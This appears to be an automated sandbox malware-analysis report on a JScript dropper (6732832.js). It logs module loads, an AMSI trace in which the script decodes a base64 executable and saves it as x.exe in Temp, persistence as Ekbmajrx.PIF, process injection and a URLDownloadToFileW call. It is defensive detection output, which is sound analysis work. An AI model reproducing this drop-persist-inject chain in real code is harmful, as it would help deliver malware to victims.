                      Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: url.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieframe.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wkscli.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: smartscreenps.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??????????.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ????.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???e???????????.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???e???????????.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: tquery.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptdll.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: spp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: vssapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: vsstrace.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppwmi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppcext.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winscard.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: devobj.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winmm.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: apphelp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: version.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: uxtheme.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: url.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ieframe.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: iertutil.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: netapi32.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: userenv.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: winhttp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: wkscli.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: netutils.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: windows.storage.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: wldp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: propsys.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: amsi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: smartscreenps.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: winmm.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: wininet.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: sspicli.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: profapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ieproxy.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: msasn1.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: mssip32.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: mswsock.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: winnsi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ??l.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ????.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ???e???????????.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ???e???????????.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ??l.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ??l.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: sppc.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: tquery.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: cryptdll.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: spp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: vssapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: vsstrace.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: sppwmi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: slc.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: sppcext.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: winscard.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: devobj.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: cryptsp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: rsaenh.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winmm.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: version.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: uxtheme.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: url.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ieframe.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: iertutil.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: netapi32.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: userenv.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: winhttp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: wkscli.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: netutils.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: windows.storage.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: wldp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: propsys.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: amsi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: smartscreenps.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: winmm.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: wininet.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: sspicli.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: profapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: mswsock.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ieproxy.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: msasn1.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: winnsi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: mssip32.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ??l.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ????.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ???e???????????.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ???e???????????.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ??l.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: ??l.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: sppc.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: tquery.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: cryptdll.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: spp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: vssapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: vsstrace.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: advapi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: sppwmi.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: slc.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: sppcext.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: winscard.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: devobj.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: cryptsp.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: rsaenh.dll
                      Source: C:\Users\user\Links\Ekbmajrx.PIF Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winmm.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: 6732832.js Static file information: File size 2619064 > 1048576
                      Source: Binary string: easinvoker.pdb source: x.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.00000000205DE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234132581.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020647000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007ED50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1237071641.0000000000979000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.00000000205DE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1237071641.000000000094A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234132581.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020647000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007ED50000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: CreateTextFile("Z:\syscalls\1105.js.csv");IXMLDOMNode._00000000();ITextStream.WriteLine(" entry:11 o: f:createElement a0:%22t%22");IXMLDOMNode._00000029("t");IXMLDOMNode._00000000();IXMLDOMElement._00000000();ITextStream.WriteLine(" exit:11 o: f:createElement r:");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");IFileSystem3._00000000();ITextStream.WriteLine(" entry:37 o: f:GetSpecialFolder a0:2");IFileSystem3.GetSpecialFolder("2");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:37 o: f:GetSpecialFolder r:C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp");_Stream.Type("1");_Stream._00000000();ITextStream.WriteLine(" entry:54 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:54 o: f:Open r:undefined");IXMLDOMElement.nodeTypedValue();_Stream._00000000();ITextStream.WriteLine(" entry:60 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:60 o: f:Write r:undefined");IFolder.Path();_Stream._00000000();ITextStream.WriteLine(" entry:68 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5Cx.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\x.exe", "2");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\1105.js.csv");IXMLDOMNode._00000000();ITextStream.WriteLine(" entry:11 o: f:createElement a0:%22t%22");IXMLDOMNode._00000029("t");IXMLDOMNode._00000000();IXMLDOMElement._00000000();ITextStream.WriteLine(" exit:11 o: f:createElement r:");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");IFileSystem3._00000000();ITextStream.WriteLine(" entry:37 o: f:GetSpecialFolder a0:2");IFileSystem3.GetSpecialFolder("2");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:37 o: f:GetSpecialFolder r:C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp");_Stream.Type("1");_Stream._00000000();ITextStream.WriteLine(" entry:54 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:54 o: f:Open r:undefined");IXMLDOMElement.nodeTypedValue();_Stream._00000000();ITextStream.WriteLine(" entry:60 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:60 o: f:Write r:undefined");IFolder.Path();_Stream._00000000();ITextStream.WriteLine(" entry:68 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5Cx.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\x.exe", "2");_Stream._00000000();ITextS
Source: Yara match File source: 3.2.x.exe.23dfc48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.x.exe.23dfc48.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1255041481.00000000023DF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02903E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,3_2_02903E20
Source: 6732832.js String: entropy: 5.84, length: 2618714, content: "TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbg
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_029162A4 push 0291630Fh; ret 3_2_02916307
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028FC3B6 push 028FC61Eh; ret 3_2_028FC616
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_029160AC push 02916125h; ret 3_2_0291611D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_0290A018 push ecx; mov dword ptr [esp], edx 3_2_0290A01D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_0290606C push 029060A4h; ret 3_2_0290609C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_029161F8 push 02916288h; ret 3_2_02916280
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02916144 push 029161ECh; ret 3_2_029161E4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028F617C push 028F61BEh; ret 3_2_028F61B6
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028F617A push 028F61BEh; ret 3_2_028F61B6
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_0297C63F push ecx; ret 3_2_0297C652
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_0295A796 push ecx; ret 3_2_0295A7A9
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028FC498 push 028FC61Eh; ret 3_2_028FC616
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02902410 push ecx; mov dword ptr [esp], edx 3_2_02902412
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02902EDA push 02902F87h; ret 3_2_02902F7F
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02902EDC push 02902F87h; ret 3_2_02902F7F
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_0297CF70 push eax; ret 3_2_0297CF8E
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028FCDE0 push 028FCE0Ch; ret 3_2_028FCE04
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028F3210 push eax; ret 3_2_028F324C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028FF600 push 028FF64Dh; ret 3_2_028FF645
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028FF4F4 push 028FF56Ah; ret 3_2_028FF562
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028FF5FF push 028FF64Dh; ret 3_2_028FF645
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02915854 push 02915A3Ah; ret 3_2_02915A32
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028FBE18 push ecx; mov dword ptr [esp], edx 3_2_028FBE1D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02903F84 push 02903FBCh; ret 3_2_02903FB4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02909FB4 push ecx; mov dword ptr [esp], edx 3_2_02909FB9
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028F5D9E push 028F5DFBh; ret 3_2_028F5DF3
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028F5DA0 push 028F5DFBh; ret 3_2_028F5DF3
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02903D40 push 02903D82h; ret 3_2_02903D7A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E35226 push ecx; ret 8_2_02E35239
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E570CF push ecx; ret 8_2_02E570E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E57A00 push eax; ret 8_2_02E57A1E

Persistence and Installation Behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\user\Links\Ekbmajrx.PIF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E062E2 ShellExecuteW,URLDownloadToFileW,8_2_02E062E2
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\user\Links\Ekbmajrx.PIF
